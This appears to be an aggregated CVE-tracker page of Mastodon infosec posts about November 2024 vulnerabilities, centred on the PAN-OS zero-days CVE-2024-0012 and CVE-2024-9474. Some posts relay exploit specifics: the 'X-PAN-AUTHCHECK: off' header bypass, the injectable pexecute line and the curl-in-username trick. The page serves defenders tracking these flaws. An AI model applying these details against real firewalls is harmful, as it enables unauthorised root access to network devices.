CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

##

screaminggoat at 2024-11-18T15:31:42.026Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

##

screaminggoat at 2024-11-18T14:29:10.181Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

##

screaminggoat@infosec.exchange at 2024-11-19T15:48:04.000Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

screaminggoat@infosec.exchange at 2024-11-18T15:31:42.000Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC

##

screaminggoat@infosec.exchange at 2024-11-18T14:29:10.000Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC

##

AAKL at 2024-11-20T16:16:25.592Z ##

Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 unit42.paloaltonetworks.com/cv

##

chris@mas.todon.rocks at 2024-11-20T08:27:11.000Z ##

r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!

labs.watchtowr.com/pots-and-pa

##

iagox86 at 2024-11-19T18:22:11.850Z ##

Favorite quote from WatchTowr's blog about PAN-OS vuln:

I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.

labs.watchtowr.com/pots-and-pa

##

mttaggart at 2024-11-19T16:13:30.453Z ##

Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.

labs.watchtowr.com/pots-and-pa

A few things stand out:

First, sorry @cR0w, no for you:

We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?

That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.

That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING

return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");

So obviously if that $username has shell metacharacters, you have yourself a nice command injection.

And guess what user the service runs as?

##

AAKL@infosec.exchange at 2024-11-20T16:16:25.000Z ##

#PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 unit42.paloaltonetworks.com/cv #cybersecurity #Infosec

##

chris@mas.todon.rocks at 2024-11-20T08:27:11.000Z ##

r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!

labs.watchtowr.com/pots-and-pa

##

iagox86@infosec.exchange at 2024-11-19T18:22:11.000Z ##

Favorite quote from WatchTowr's blog about PAN-OS vuln:

I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.

labs.watchtowr.com/pots-and-pa

##

mttaggart@infosec.exchange at 2024-11-19T16:13:30.000Z ##

Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.

labs.watchtowr.com/pots-and-pa

A few things stand out:

First, sorry @cR0w, no #directorytraversalmemes for you:

We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?

That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.

That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING

return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");

So obviously if that $username has shell metacharacters, you have yourself a nice command injection.

And guess what user the service runs as?

##

AAKL@infosec.exchange at 2024-11-19T15:17:42.000Z ##

WatchTower: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 labs.watchtowr.com/pots-and-pa #cybersecurity #infosec #PaloAlto

##

AAKL@infosec.exchange at 2024-11-19T14:00:31.000Z ##

If you missed this, #PaloAlto has patched a Firewall Zero-Day Exploited in Operation Lunar Peek securityweek.com/palo-alto-pat @SecurityWeek @ekovacs

More:

Palo Alto Unit 42 posted this yesterday about Lunar Peek activity related to CVE-2024-0012: unit42.paloaltonetworks.com/cv

##

ljrk@todon.eu at 2024-11-19T11:30:19.000Z ##

@christopherkunz Palo Alto keeps on giving.

labs.watchtowr.com/pots-and-pa

##

GossiTheDog@cyberplace.social at 2024-11-19T11:07:22.000Z ##

Weeeeeee

I don’t know why Palo-Alto changed the CVEs at the last minute to remove reference to RCE. It’s remote code execution. labs.watchtowr.com/pots-and-pa

##

_r_netsec@infosec.exchange at 2024-11-19T09:43:06.000Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 - watchTowr Labs labs.watchtowr.com/pots-and-pa

##

oversecurity@mastodon.social at 2024-11-19T09:10:08.000Z ##

CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog

: CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).

🔗️ [Cyble] link.is.it/so5jib

##

screaminggoat@infosec.exchange at 2024-11-18T22:03:01.000Z ##

@catc0n I noticed the disparity between the CVE-2024-9474 advisory description "privilege escalation vulnerability" and CISA's KEV Catalog name "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"

Palo Alto Networks discarded the verbiage from Thursday "unauthenticated remote command execution vulnerability" and divided the unauth RCE into 2 separate vulnerabilities, while stating that one would be allow for the other.

So authentication bypass to admin (CVE-2024-0012), then authenticated privesc from admin to root (CVE-2024-9474).

Unit 42 skipped talking about CVE-2024-9474.

The CVSSv4 vector is CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/AU:N/R:U/V:C/RE:H/U:Red I think the real takeaway is that only Integrity is impacted. Everything else appears to be the consequence of having root privileges on a firewall

##

screaminggoat@infosec.exchange at 2024-11-18T21:03:07.000Z ##

@shadowserver IOCs provided by Unit 42: unit42.paloaltonetworks.com/cv

CVEs were added to CISA's KEV Catalog: cisa.gov/news-events/alerts/20

##

AAKL@infosec.exchange at 2024-11-18T20:25:29.000Z ##

#CISA has updated the KEV catalogue:

CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024- @cisacyber #cybersecurity #infosec #PaloAlto

##

cisakevtracker@mastodon.social at 2024-11-18T20:00:50.000Z ##

CVE ID: CVE-2024-9474
Vendor: Palo Alto Networks
Product: PAN-OS
Date Added: 2024-11-18
Vulnerability: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2024-11-18T16:27:18.000Z ##

#PaloAlto has updated its security advisories: security.paloaltonetworks.com/

- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface security.paloaltonetworks.com/

- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface @paloaltontwks #cybersecurity #infosec

##

jos1264@social.skynetcloud.site at 2024-11-18T16:20:02.000Z ##

Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) helpnetsecurity.com/2024/11/18 #PaloAltoNetworks #enterprise #Don'tmiss #Hotstuff #firewall #0-day #News #CVE

##

zeljkazorz@infosec.exchange at 2024-11-18T16:06:38.000Z ##

Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days.

CVE-2024-0012 is the (previously unspecified) unauthenticated remote command execution zero-day that the company started warning about ten days ago.

helpnetsecurity.com/2024/11/18

#CVE #Cybersecurity

##

cR0w@infosec.exchange at 2024-11-18T15:30:09.000Z ##

@screaminggoat "Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly." 🤔

unit42.paloaltonetworks.com/cv

##

AAKL@infosec.exchange at 2024-11-18T15:12:39.000Z ##

Palo Alto Unit42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 unit42.paloaltonetworks.com/cv @unit42_intel #cybersecurity #infosec

##

screaminggoat@infosec.exchange at 2024-11-18T14:57:27.000Z ##

@neurovagrant start your Monday off with exploited zero-days:

##

screaminggoat@infosec.exchange at 2024-11-18T14:49:21.000Z ##

@therecord_media @jwarminsky @jgreig can this news article be updated to include the two CVE IDs?: CVE-2024-0012 and CVE-2024-9474

##

CVE-2024-11159
(4.3 MEDIUM)

EPSS: 0.05%

updated 2024-11-19T14:56:37.800000

2 posts

Using remote content in OpenPGP encrypted messages can lead to the disclosure of plaintext. This vulnerability affects Thunderbird < 128.4.3 and Thunderbird < 132.0.1.

wilhelm@fedia.social at 2024-11-14T11:07:56.460Z ##

#Thunderbird casually fiing a high security vulnerability in their #OpenPGP implementation

#CVE-2024-11159 Using remote content in OpenPGP encrypted messages can lead to the disclosure of plaintext.

www.mozilla.org/en-US/security/advisories/mfsa2024-61/

##

screaminggoat@infosec.exchange at 2024-11-13T15:18:38.000Z ##

Mozilla Foundation security advisories:

  • 2024-61 Security Vulnerabilities fixed in Thunderbird 128.4.3 CVE-2024-11159 (high) Potential disclosure of plaintext in OpenPGP encrypted message
  • 2024-62 Security Vulnerabilities fixed in Thunderbird 132.0.1 CVE-2024-11159 (high) Potential disclosure of plaintext in OpenPGP encrypted message

No mention of exploitation

#mozilla #thunderbird #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-48510
(9.8 CRITICAL)

EPSS: 0.06%

updated 2024-11-18T23:41:15

3 posts

Directory Traversal vulnerability in DotNetZip v.1.16.0 and before allows a remote attacker to execute arbitrary code via the src/Zip.Shared/ZipEntry.Extract.cs component

swapgs at 2024-11-19T10:43:27.006Z ##

Finally got to publish the CVE for a "forever-day" path traversal in the .NET library DotNetZip affecting all releases since 2018. Enjoy, the PoC is in the patch! :blobcatsuit:

cve.org/CVERecord?id=CVE-2024-

##

swapgs@infosec.exchange at 2024-11-19T10:43:27.000Z ##

Finally got to publish the CVE for a "forever-day" path traversal in the .NET library DotNetZip affecting all releases since 2018. Enjoy, the PoC is in the patch! :blobcatsuit: #CVE_2024_48510

cve.org/CVERecord?id=CVE-2024-

##

cR0w@infosec.exchange at 2024-11-14T16:11:06.000Z ##

nvd.nist.gov/vuln/detail/CVE-2

#directoryTraversalMemes

##

CVE-2024-49019
(7.8 HIGH)

EPSS: 0.05%

updated 2024-11-18T21:12:46.067000

3 posts

Active Directory Certificate Services Elevation of Privilege Vulnerability

screaminggoat@infosec.exchange at 2024-11-12T23:03:30.000Z ##

TrustedSec: EKUwu: Not just another AD CS ESC
The publicly disclosed zero-day CVE-2024-49019, (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability, appears to be the one mentioned in the 08 October 2024 blog post by TrustedSec. Dubbed "EKUwu," an attacker can craft a certificate signing request, or CSR, (using built-in default version 1 certificate templates) to include application policies that are preferred over the configured Extended Key Usage attributes specified in the template. The only requirement is enrollment rights, and it can be used to generate client authentication, certificate request agent, and codesigning certificates using the WebServer template.

According to the timeline, TrustedSec reported the vulnerability on 30 August and Microsoft Security Response Center responded on 28 September saying that "the default configuration was not vulnerable" but requested that they "hold off on publishing any details." UwU what's this? Cue the 08 October blog post disclosing the vulnerability and details.

h/t: @dreadpir8robots cc: @cR0w

#CVE_2024_49019 #zeroday #microsoft #EKUwu #cve #vulnerability

##

cR0w@infosec.exchange at 2024-11-12T21:35:30.000Z ##

Ref: msrc.microsoft.com/update-guid

##

screaminggoat@infosec.exchange at 2024-11-12T17:59:09.000Z ##

Happy #PatchTuesday from Microsoft: FOUR ZERO-DAYS (3 publicly disclosed, 2 actively exploited) 89 vulnerabilities

  • CVE-2024-43451 (6.5 medium) NTLM Hash Disclosure Spoofing Vulnerability (EXPLOITED, PUBLICLY DISCLOSED)
  • CVE-2024-49039 (8.8 high) Windows Task Scheduler Elevation of Privilege Vulnerability (EXPLOITED)
  • CVE-2024-49019 (7.8 high) Active Directory Certificate Services Elevation of Privilege Vulnerability (PUBLICLY DISCLOSED)
  • CVE-2024-49040 (7.5 high) Microsoft Exchange Server Spoofing Vulnerability (PUBLICLY DISCLOSED)

#zeroday #vulnerability #microsoft #cve #eitw #activeexploitation #infosec #cybersecurity

##

CVE-2024-52940
(7.5 HIGH)

EPSS: 0.04%

updated 2024-11-18T18:32:00

1 posts

AnyDesk through 8.1.0 on Windows, when Allow Direct Connections is enabled, inadvertently exposes a public IP address within network traffic. The attacker must know the victim's AnyDesk ID.

1 repos

#search_error

CVE-2023-0657
(3.4 LOW)

EPSS: 0.04%

updated 2024-11-18T17:11:17.393000

4 posts

A flaw was found in Keycloak. This issue occurs due to improperly enforcing token types when validating signatures locally. This could allow an authenticated attacker to exchange a logout token for an access token and possibly gain access to data outside of enforced permissions.

CVE-2023-1419
(5.9 MEDIUM)

EPSS: 0.09%

updated 2024-11-18T17:11:17.393000

4 posts

A script injection vulnerability was found in the Debezium database connector, where it does not properly sanitize some parameters. This flaw allows an attacker to send a malicious request to inject a parameter that may allow the viewing of unauthorized data.

CVE-2023-4639
(7.4 HIGH)

EPSS: 0.10%

updated 2024-11-18T17:11:17.393000

4 posts

A flaw was found in Undertow, which incorrectly parses cookies with certain value-delimiting characters in incoming requests. This issue could allow an attacker to construct a cookie value to exfiltrate HttpOnly cookie values or spoof arbitrary additional cookie values, leading to unauthorized data access or modification. The main threat from this flaw impacts data confidentiality and integrity.

CVE-2023-6110
(5.5 MEDIUM)

EPSS: 0.08%

updated 2024-11-18T17:11:17.393000

4 posts

A flaw was found in OpenStack. When a user tries to delete a non-existing access rule in it's scope, it deletes other existing access rules which are not associated with any application credentials.

CVE-2023-43091
(9.8 CRITICAL)

EPSS: 0.04%

updated 2024-11-17T15:30:52

4 posts

A flaw was found in GNOME Maps, which is vulnerable to a code injection attack via its service.json configuration file. If the configuration file is malicious, it may execute arbitrary code.

CVE-2020-25720
(7.5 HIGH)

EPSS: 0.05%

updated 2024-11-17T12:30:36

4 posts

A vulnerability was found in Samba where a delegated administrator with permission to create objects in Active Directory can write to all attributes of the newly created object, including security-sensitive attributes, even after the object's creation. This issue occurs because the administrator owns the object due to the lack of an Access Control List (ACL) at the time of creation and later being

CVE-2024-49060
(8.8 HIGH)

EPSS: 0.04%

updated 2024-11-15T21:30:53

2 posts

Azure Stack HCI Elevation of Privilege Vulnerability

AAKL@infosec.exchange at 2024-11-16T16:06:54.000Z ##

This was added to #Microsoft's advisories yesterday:

Security vulnerability for Arc VMs running on #Azure Stack HCI, version 23H2 github.com/Azure/AzureStackHCI #cybersecurity #Infosec

##

screaminggoat@infosec.exchange at 2024-11-15T22:47:51.000Z ##

Microsoft Security Response Center (MSRC): CVE-2024-49060
Leave it to Microsoft to drop an out-of-band vulnerability outside of Patch Tuesday. CVE-2024-49060 (8.8 high) Azure Stack HCI Elevation of Privilege Vulnerability. Not Exploited, not Publicly disclosed, Exploitation More Likely. Read the FAQ for explanation of AV:L and S:C.

#microsoft #vulnerability #cve #infosec #cybersecurity #azure

##

CVE-2024-50986(CVSS UNKNOWN)

EPSS: 0.04%

updated 2024-11-15T15:31:04

1 posts

An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file.

1 repos

https://github.com/riftsandroses/CVE-2024-50986

CVE-2024-9465
(9.1 CRITICAL)

EPSS: 94.95%

updated 2024-11-15T14:39:34.863000

10 posts

An SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. With this, attackers can also create and read arbitrary files on the Expedition system.

Nuclei template

2 repos

https://github.com/mustafaakalin/CVE-2024-9465

https://github.com/horizon3ai/CVE-2024-9465

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

screaminggoat at 2024-11-14T19:30:12.967Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

  • CVE-2024-9463 (9.9 critical) Palo Alto Networks Expedition OS Command Injection Vulnerability
  • CVE-2024-9465 (9.2 critical) Palo Alto Networks Expedition SQL Injection Vulnerability

##

screaminggoat@infosec.exchange at 2024-11-14T19:30:12.000Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

  • CVE-2024-9463 (9.9 critical) Palo Alto Networks Expedition OS Command Injection Vulnerability
  • CVE-2024-9465 (9.2 critical) Palo Alto Networks Expedition SQL Injection Vulnerability

#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity

##

oversecurity@mastodon.social at 2024-11-18T07:40:10.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog

CISA has added CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical vulnerabilities in Palo Alto Networks Expedition are actively...

🔗️ [Cyble] link.is.it/qfqgxi

##

jos1264@social.skynetcloud.site at 2024-11-15T11:40:04.000Z ##

Palo Alto Networks firewalls, Expedition under attack (CVE-2024-9463, CVE-2024-9465) helpnetsecurity.com/2024/11/15 #configurationmanagement #PaloAltoNetworks #Horizon3.ai #enterprise #Don'tmiss #Hotstuff #firewall #Censys #News #CISA

##

rogeragrimes@infosec.exchange at 2024-11-14T21:47:24.000Z ##

Another SQL injection vuln. Not the last. Why? Well, part of the prob is we don't teach secure coding in most programing curriculums and companies hiring programmers don't require that programmers have secure coding skills. Time to maybe do this things?

cve.org/CVERecord?id=CVE-2024-

##

cisakevtracker@mastodon.social at 2024-11-14T19:00:54.000Z ##

CVE ID: CVE-2024-9465
Vendor: Palo Alto Networks
Product: Expedition
Date Added: 2024-11-14
Vulnerability: Palo Alto Networks Expedition SQL Injection Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-7404
(6.8 MEDIUM)

EPSS: 0.04%

updated 2024-11-15T13:58:08.913000

1 posts

An issue was discovered in GitLab CE/EE affecting all versions starting from 17.2 prior to 17.3.7, starting from 17.4 prior to 17.4.4 and starting from 17.5 prior to 17.5.2, which could have allowed an attacker gaining full API access as the victim via the Device OAuth flow.

screaminggoat@infosec.exchange at 2024-11-13T14:08:31.000Z ##

GitLab security advisory: GitLab Patch Release: 17.5.2, 17.4.4, 17.3.7

  1. CVE-2024-9693 (8.5 high) Unauthorized access to Kubernetes cluster agent
  2. CVE-2024-7404 (6.8 medium) Device OAuth flow allows for cross window forgery
  3. requested CVE ID not yet available (6.5 medium) Denial of Service by importing malicious crafted FogBugz import payload
  4. CVE-2024-8648 (6.1 medium) Stored XSS through javascript URL in Analytics dashboards
  5. CVE-2024-8180 (5.4 medium) HTML injection in vulnerability Code flow could lead to XSS on self hosted instances
  6. CVE-2024-10240 (5.3 medium) Information disclosure through an API endpoint

No mention of exploitation.

#GitLab #PatchTuesday #CVE #vulnerability #infosec #cybersecurity

##

CVE-2024-9463
(7.5 HIGH)

EPSS: 96.23%

updated 2024-11-15T02:00:01.687000

9 posts

An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

Nuclei template

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

jos1264@social.skynetcloud.site at 2024-11-18T07:40:01.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog cyble.com/blog/cisa-adds-two-c #OSCommandInjection #Vulnerability #CVE20249463 #CVE20249465 #CISA

##

screaminggoat at 2024-11-14T19:30:12.967Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

  • CVE-2024-9463 (9.9 critical) Palo Alto Networks Expedition OS Command Injection Vulnerability
  • CVE-2024-9465 (9.2 critical) Palo Alto Networks Expedition SQL Injection Vulnerability

##

screaminggoat@infosec.exchange at 2024-11-14T19:30:12.000Z ##

CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Not quite hot, but I was stuck in meetings. CISA has added two new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation.

  • CVE-2024-9463 (9.9 critical) Palo Alto Networks Expedition OS Command Injection Vulnerability
  • CVE-2024-9465 (9.2 critical) Palo Alto Networks Expedition SQL Injection Vulnerability

#cisa #cisakev #vulnerability #kev #knownexploitedvulnerabilitiescatalog #CVE_2024_9463 #CVE_2024_9465 #cve #paloaltonetworks #pan #infosec #cybersecurity

##

oversecurity@mastodon.social at 2024-11-18T07:40:10.000Z ##

CISA Adds Two Critical Palo Alto Networks Vulnerabilities to Known Exploited Catalog

CISA has added CVE-2024-9463 and CVE-2024-9465 to its KEV catalog. These critical vulnerabilities in Palo Alto Networks Expedition are actively...

🔗️ [Cyble] link.is.it/qfqgxi

##

jos1264@social.skynetcloud.site at 2024-11-15T11:40:04.000Z ##

Palo Alto Networks firewalls, Expedition under attack (CVE-2024-9463, CVE-2024-9465) helpnetsecurity.com/2024/11/15 #configurationmanagement #PaloAltoNetworks #Horizon3.ai #enterprise #Don'tmiss #Hotstuff #firewall #Censys #News #CISA

##

cisakevtracker@mastodon.social at 2024-11-14T19:01:09.000Z ##

CVE ID: CVE-2024-9463
Vendor: Palo Alto Networks
Product: Expedition
Date Added: 2024-11-14
Vulnerability: Palo Alto Networks Expedition OS Command Injection Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

CVE-2024-52551
(8.0 HIGH)

EPSS: 0.04%

updated 2024-11-14T22:45:14

1 posts

Jenkins Pipeline: Declarative Plugin 2.2214.vb_b_34b_2ea_9b_83 and earlier does not check whether the main (Jenkinsfile) script used to restart a build from a specific stage is approved, allowing attackers with Item/Build permission to restart a previous build whose (Jenkinsfile) script is no longer approved. This allows attackers with Item/Build permission to restart a previous build whose (Jenki

screaminggoat@infosec.exchange at 2024-11-13T22:20:22.000Z ##

Jenkins Security Advisory 2024-11-13

  • CVE-2024-52549 (4.3 medium) Missing permission check in Script Security Plugin
  • CVE-2024-52550 (8.0 high) Rebuilding a run with revoked script approval allowed by Pipeline: Groovy Plugin
  • CVE-2024-52551 (8.0 high) Restarting a run with revoked script approval allowed by Pipeline: Declarative Plugin
  • CVE-2024-52552 (8.0 high) Stored XSS vulnerability in Authorize Project Plugin
  • CVE-2024-52553 (8.8 high) Session fixation vulnerability in OpenId Connect Authentication Plugin
  • CVE-2022-46751 (7.1 high) XXE vulnerability in IvyTrigger Plugin
  • CVE-2024-52554 (8.8 high) Script security bypass vulnerability in Shared Library Version Override Plugin

No mention of exploitation.

#jenkins #vulnerability #CVE #infosec #cybersecurity

##

CVE-2024-52552
(8.0 HIGH)

EPSS: 0.04%

updated 2024-11-14T22:45:13

1 posts

